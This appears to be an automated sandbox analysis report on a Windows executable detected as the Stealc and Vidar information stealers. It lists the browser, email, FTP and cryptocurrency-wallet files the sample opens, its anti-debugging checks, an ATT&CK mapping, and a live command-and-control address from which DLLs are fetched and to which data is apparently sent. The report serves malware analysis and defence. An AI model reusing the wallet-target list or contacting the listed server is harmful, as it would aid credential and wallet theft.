Source: FHCAFIDB.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: FHCAFIDB.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: FHCAFIDB.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: FHCAFIDB.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: FHCAFIDB.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: FHCAFIDB.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: FHCAFIDB.0.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: FHCAFIDB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: FHCAFIDB.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: FHCAFIDB.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: FHCAFIDB.0.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: FHCAFIDB.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: FHCAFIDB.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: FHCAFIDB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: FHCAFIDB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: FHCAFIDB.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW f

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_0042F2D9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0042F2D9

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_0042CF5F VirtualProtect ?,-00000001,00000104,?

0_2_0042CF5F

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_004570F0 LoadLibraryW,GetProcAddress,GetProcAddress,FreeLibrary,

0_2_004570F0

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0042D11E SetUnhandledExceptionFilter,	0_2_0042D11E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0042F2D9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0042F2D9
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0043333D __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0043333D

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR

Source: fXg8zgxVTF.exe	Binary or memory string: Shell_TrayWnd
Source: fXg8zgxVTF.exe	Binary or memory string: OLEACC.dllntdll.dllRtlRandomSecureRemoveFile%I64dInvalid DateTimeInvalid DateTimeSpanVerdanaUndeleteMyFilesUndeleteMyFilesApplication is searching for deleted files. Do you want to terminate it?UndeleteMyFilesexplorerPlease close first mail recovery tool.http://seriousbit.com/openShell_TrayWndhttp://www.seriousbit.com/exploreropenInvalid DateTimeInvalid DateTimeSpanUndeleteMyFilesChoose the folder where you want MyUnDelete application to put recovered filesUndeleteMyFilesInvalid directory name.UndeleteMyFilesThe disk letter of source files is the same as disk letter of destination. It is strongly recommended that you choose another location.

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_0042E05D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0042E05D

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_004346F9 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

0_2_004346F9

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_0040E09D _memset,GetVersionExA,

0_2_0040E09D

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002FB5000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\.
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\MultiDoge\\multidoge.walleti
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	1 Masquerading	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	1 Input Capture	21 Security Software Discovery	Remote Desktop Protocol	1 Email Collection	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	11 Application Window Discovery	Distributed Component Object Model	1 Archive Collected Data	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	4 Data from Local System	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	26 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
fXg8zgxVTF.exe	34%	ReversingLabs	Win32.Spyware.Stealc

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	0%	URL Reputation	safe

Name	Malicious	Reputation
http://95.182.96.50/fee3b98529eb4b43/nss3.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/msvcp140.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/freebl3.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/mozglue.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/sqlite3.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/vcruntime140.dll	true	unknown
http://95.182.96.50/fee3b98529eb4b43/softokn3.dll	true	unknown
95.182.96.50/2aced82320799c96.php	true	unknown
